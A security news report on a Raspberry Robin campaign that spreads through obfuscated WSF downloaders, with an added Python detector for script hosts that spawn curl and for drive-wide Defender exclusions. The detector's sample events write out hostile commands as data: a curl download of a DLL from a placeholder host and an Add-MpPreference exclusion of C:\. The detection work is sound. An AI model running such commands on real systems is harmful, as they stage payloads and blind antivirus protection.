Cybersecurity researchers have discovered a new Raspberry Robin campaign wave that has been propagating the malware through malicious Windows Script Files (WSFs) since March 2024.
"Historically, Raspberry Robin was known to spread through removable media like USB drives, but over time its distributors have experimented with other initial infection vectors," HP Wolf Security said in a report shared with The Hacker News.
Raspberry Robin, also known as the QNAP worm, was first observed in September 2021 and has since evolved into a downloader for a range of other payloads, such as SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot, as well as serving as a precursor to ransomware.
While the malware was originally distributed via USB devices containing LNK files that retrieved the payload from a compromised QNAP device, it has since adopted other methods such as social engineering and malvertising.
It is attributed to an emerging threat cluster tracked by Microsoft as Storm-0856, which has links to the broader cybercrime ecosystem, including groups like Evil Corp, Silence, and TA505.
The latest distribution vector involves WSF files offered for download via various domains and subdomains.
It is currently unclear how the attackers are directing victims to these URLs, although it is suspected that this happens through either spam or malvertising campaigns.
The heavily obfuscated WSF file functions as a downloader that retrieves the main DLL payload from a remote server using the curl command, but only after a series of anti-analysis and anti-virtual-machine checks have been run to determine whether it is executing in a virtualized environment.
It is also designed to terminate execution if the build number of the Windows operating system is lower than 17063 (an Insider build released in December 2017, and the first to ship curl.exe with Windows, which is why an older build would break the download step) or if the list of running processes includes antivirus processes associated with Avast, Avira, Bitdefender, Check Point, ESET, and Kaspersky.
What's more, it configures Microsoft Defender Antivirus exclusion rules in an attempt to sidestep detection, adding the entire main drive to the exclusion list and thereby preventing it from being scanned.
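The two behaviours above that are most useful to hunt for are a script host (wscript.exe or cscript.exe, the hosts a .wsf runs under) spawning curl.exe, and a Defender path exclusion that covers a whole drive. The following detector, an added example that is not HP Wolf Security's code and not part of the original report, runs those two checks over constructed Sysmon-style events (EventID 1 process creation, EventID 13 registry value set). The event contents, the `example.invalid` URLs, and the assumption that the exclusion is set either through the `Windows Defender\Exclusions\Paths` registry key or via `Add-MpPreference` are all hypothetical; the report only says the drive is added to the exclusion list, not how.

```python
"""Hunting heuristics for the WSF downloader behaviours described in the report.

Added example, not code from HP Wolf Security or from the malware itself.
The events below are constructed to resemble Sysmon process-creation (EventID 1)
and registry value-set (EventID 13) records: field names follow Sysmon's, but
every value is made up for the demonstration.
"""
from dataclasses import dataclass
import re

# Script hosts a .wsf file runs under.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Built-in downloaders a script host rarely has a legitimate reason to spawn.
DOWNLOAD_TOOLS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}

# Defender stores path exclusions as value *names* under this key, so Sysmon's
# TargetObject ends with the excluded path itself.
DEFENDER_EXCLUSIONS_RE = re.compile(
    r"\\Windows Defender\\Exclusions\\Paths\\(.+)$", re.IGNORECASE)
# A bare drive root such as C: or C:\ is the over-broad exclusion the report describes.
DRIVE_ROOT_RE = re.compile(r"^[A-Za-z]:\\?$")
# The same exclusion set from PowerShell (an assumed mechanism, not stated in the report).
ADD_MPPREF_RE = re.compile(
    r"""Add-MpPreference\b.*-ExclusionPath\s+['"]?([A-Za-z]:\\?)(?=['"\s]|$)""",
    re.IGNORECASE)


@dataclass
class Event:
    event_id: int
    image: str = ""
    parent_image: str = ""
    command_line: str = ""
    target_object: str = ""  # registry key/value path (EventID 13)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_script_host_download(ev: Event):
    """wscript/cscript spawning curl (or a similar built-in downloader)."""
    if ev.event_id != 1:
        return None
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in SCRIPT_HOSTS and child in DOWNLOAD_TOOLS:
        return f"{parent} spawned {child}: {ev.command_line}"
    return None


def flag_drive_wide_exclusion(ev: Event):
    """A Defender path exclusion covering an entire drive, via registry or Add-MpPreference."""
    if ev.event_id == 13:
        m = DEFENDER_EXCLUSIONS_RE.search(ev.target_object)
        if m and DRIVE_ROOT_RE.match(m.group(1)):
            return f"Defender exclusion added for whole drive {m.group(1)}"
    elif ev.event_id == 1:
        m = ADD_MPPREF_RE.search(ev.command_line)
        if m:
            return f"Add-MpPreference excluded whole drive {m.group(1)}"
    return None


def hunt(events):
    """Run every check over every event and return the list of findings."""
    findings = []
    for ev in events:
        for check in (flag_script_host_download, flag_drive_wide_exclusion):
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample telemetry: three malicious events followed by two benign ones.
SAMPLE_EVENTS = [
    Event(1, image="C:\\Windows\\System32\\curl.exe",
          parent_image="C:\\Windows\\System32\\wscript.exe",
          command_line="curl.exe -o C:\\Users\\Public\\stage.dll http://example.invalid/x"),
    Event(1, image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
          parent_image="C:\\Windows\\System32\\wscript.exe",
          command_line="powershell.exe -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""),
    Event(13, image="C:\\Windows\\System32\\wscript.exe",
          target_object="HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\"),
    Event(1, image="C:\\Windows\\System32\\curl.exe",
          parent_image="C:\\Windows\\System32\\cmd.exe",
          command_line="curl.exe https://example.invalid/health"),
    Event(13, image="C:\\Program Files\\Windows Defender\\MsMpEng.exe",
          target_object="HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Backups\\"),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print("ALERT:", finding)
```

Run as a script it prints three alerts: the wscript-to-curl download, the Add-MpPreference call, and the registry-set drive-root exclusion; the cmd-spawned curl and the narrower `C:\Backups\` exclusion are left alone. On a real estate the drive-root check is the low-noise one; the script-host-spawns-curl rule will need an allow-list for any legitimate logon scripts that fetch files.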
"The scripts themselves are currently not classified as malicious by any anti-virus scanners on VirusTotal, demonstrating the evasiveness of the malware and the risk of it causing a serious infection with Raspberry Robin," HP said.
"The WSF downloader is heavily obfuscated and uses many anti-analysis techniques enabling the malware to evade detection and slow down analysis."